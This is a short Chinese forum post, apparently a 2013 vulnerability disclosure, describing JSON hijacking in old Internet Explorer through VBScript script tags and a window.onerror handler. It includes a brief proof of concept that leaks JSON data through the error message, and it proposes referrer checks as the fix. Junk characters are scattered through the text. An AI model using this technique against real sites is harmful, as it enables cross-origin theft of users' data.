简要描述:
& i: f! g5 ]/ W6 Y9 m. b. U2 @" C2 J% ]! D0 t
由于某些资源容器对数据处理不当导致json劫持漏洞.
- p, p& m# A6 D! _; U% _9 R5 F详细说明:. R- T8 K Q6 r/ h) o- [8 K
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
) f. e: u! O' q: }<script language=vbscript></script>: x$ |) d& @7 C4 B( _
& s" u- x7 p' q7 T7 }& s
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.3 Y5 f% o: O- r4 J( A5 I
漏洞证明:' r+ r5 z, \4 L/ N3 M9 t% c
<script>4 w0 C5 L5 }# ~2 P4 w
window.onerror=function(_){! i! f5 l+ b. x! _5 D: |$ M
alert(_)/ D6 N' Z1 g* R$ `; Z5 F
}/ n ^, d8 g/ e) q3 K2 a/ D* J
</script>
+ z5 p4 m6 F( R4 `, |) `. W0 b<script language=vbscript src=1.json></script>, f H5 z( s) {+ |; C
6 q5 b* |: H- g0 d7 Z
: L7 ?6 L2 d& C& Z1.json:
5 E9 N7 k4 X5 f) a[{"name":"sogili","age":19}]
2 ~5 @) Z8 f* |# x. b5 B2 q5 j D修复方案:
, ?8 ]8 a% ~# g/ e网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对